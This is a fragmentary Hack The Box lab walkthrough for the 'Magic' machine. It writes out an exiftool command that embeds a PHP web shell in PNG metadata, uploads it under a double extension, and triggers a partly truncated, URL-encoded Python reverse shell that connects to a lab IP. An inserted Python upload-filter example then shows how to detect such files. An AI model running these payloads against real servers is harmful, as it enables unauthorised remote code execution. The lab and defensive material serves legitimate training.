Magic — HTB walkthrough


Nmap scan

Aggressive scan for versions with default scripts
Visiting the website
# exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' exploit.png
# cp exploit.png exploit.php.png
We get uploads.
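The file uploaded in the step above has a .php component ahead of its image extension and PHP code in its Comment metadata. An upload filter can flag both; the check below is an added example, not part of the original walkthrough or the target application, and its function names, extension list and sample bytes are constructed for illustration.

```python
import re

# Extensions a PHP-enabled server may hand to the interpreter (assumed list).
EXEC_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phps", "phar"}
# PHP open tags: "<?php" and the short echo form "<?=".
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def risky_extensions(filename):
    """Return every executable extension found in any position of the name."""
    parts = filename.lower().split(".")[1:]
    return [p for p in parts if p in EXEC_EXT]


def inspect_upload(filename, data):
    """Return a list of reasons to reject the upload (empty list = accept)."""
    reasons = []
    hits = risky_extensions(filename)
    if hits:
        # Catches names like exploit.php.png, where only the last part is an image.
        reasons.append("executable extension in name: " + ",".join(hits))
    if not data.startswith(PNG_MAGIC):
        reasons.append("missing PNG signature")
    if PHP_TAG.search(data):
        # A valid image header does not rule out code stored in metadata.
        reasons.append("PHP open tag inside file content")
    return reasons


# Constructed samples: a PNG signature plus filler bytes, and the same bytes
# with a text comment carrying a harmless PHP tag as a stand-in for metadata.
CLEAN = PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 32
TAGGED = CLEAN + b"tEXtComment\x00<?php echo 1; ?>"

if __name__ == "__main__":
    for name, blob in [("photo.png", CLEAN), ("exploit.php.png", TAGGED)]:
        print(name, "->", inspect_upload(name, blob) or "accept")
```

Content scanning like this is a tripwire. Re-encoding the image on upload and serving uploads from a location where PHP is never executed removes the metadata path entirely.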


We access the uploaded image and get a reverse shell using the cmd parameter we added in our payload.
,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.16%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);[%22/bin/sh%22,%22-i%22]);%27
Getting user.txt


Enumerating, we see that user theseus has SUID privileges on /usr/bin/sysinfo.



Dhanishtha Awasthi


OSCP | CEH | Cyber Security Enthusiast.